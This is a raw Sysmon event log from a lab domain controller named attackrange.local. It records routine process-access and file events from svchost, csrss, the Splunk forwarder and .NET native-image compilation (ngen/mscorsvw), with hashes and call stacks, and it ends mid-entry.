21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.984{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.968{4DB9351A-A26C-60D3-1F05-00000000CF01}4720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZG8S7PJPUN\System.Runtime.WindowsRuntime.UI.Xaml.ni.dll.auxMD5=8587B16400669B0ED0FEF2A164426A58,SHA256=D00A7F367941415A86EF6347CDD4F148D9F3D5547C165F348B128AEA4036D97C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.968{4DB9351A-A26C-60D3-1F05-00000000CF01}4720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZG8S7PJPUN\System.Runtime.WindowsRuntime.UI.Xaml.ni.dllMD5=7B885BDEE599A19BB7F5F0C7FE7CA7C1,SHA256=92006247CB0F0C7D8B289F241FDADA2C07FF5B3A65A0AAA261D467ACCDF63A21,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.936{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A26C-60D3-1E05-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K840NGD2KB\System.Runtime.WindowsRuntime.ni.dll.auxMD5=7E1BA6F004327D87B33CDC84A1E174E2,SHA256=A7D5238F6EF69A01F3068C5DAEE5D19E3A10229AEE1DE1D1BE7F2CD265251978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A26C-60D3-1E05-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K840NGD2KB\System.Runtime.WindowsRuntime.ni.dllMD5=3728FE7D5E46B8174BDF4B0CB3F32D4C,SHA256=6E0AAF51B717224BFF1D1BFE4D2AC9F18E8037FE14C13D68592A3461540ACE53,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.780{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.765{4DB9351A-A26C-60D3-1D05-00000000CF01}7008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BBMYPFWXBL\System.Xml.Linq.ni.dll.auxMD5=4A148C61F07E22CD3E4BF30752ED869C,SHA256=E235A9BCF4497D16500E1AA1AA2F161512955D9912BD9488828B0939EF68B42D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.765{4DB9351A-A26C-60D3-1D05-00000000CF01}7008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BBMYPFWXBL\System.Xml.Linq.ni.dllMD5=2EA51644F79FD5C555C12EF33462D4C6,SHA256=2675E7B9B2D3E9F396FB55D1925853AD5E15A30E4FF23834901020CC90AED626,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=511E115E3037EFFCDFF3E140F5E2A9EA,SHA256=CDC10B353FE1D2F1CC9A9D2017C4CBF76CE8FD0CEE3FB7FA7B1914A345548B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0F2E059C646D4D5AD0DFE7FBC6B172,SHA256=94400AD645864338C327246ABAC8700E8CB9FFBB46D88FD10685BEBCADFCD5F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.733{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-A26C-60D3-1C05-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LV2HKH4ALF\System.Net.Http.ni.dll.auxMD5=17D7D82FA4E5F7AC7B0F942186A6A559,SHA256=18512E0DB188F63EEF52FA2BEFFDF9B1CA2B40C3CA4DC473FFBA87DDC3F9E0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-A26C-60D3-1C05-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LV2HKH4ALF\System.Net.Http.ni.dllMD5=38C711EAF3F4DD244AF9B53A604DC9EA,SHA256=E3D5B75A615E7CAEED67FBE0F0BB371D210F8ED75B10F831AC4DE0B38762D1E0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.625{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.593{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.593{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET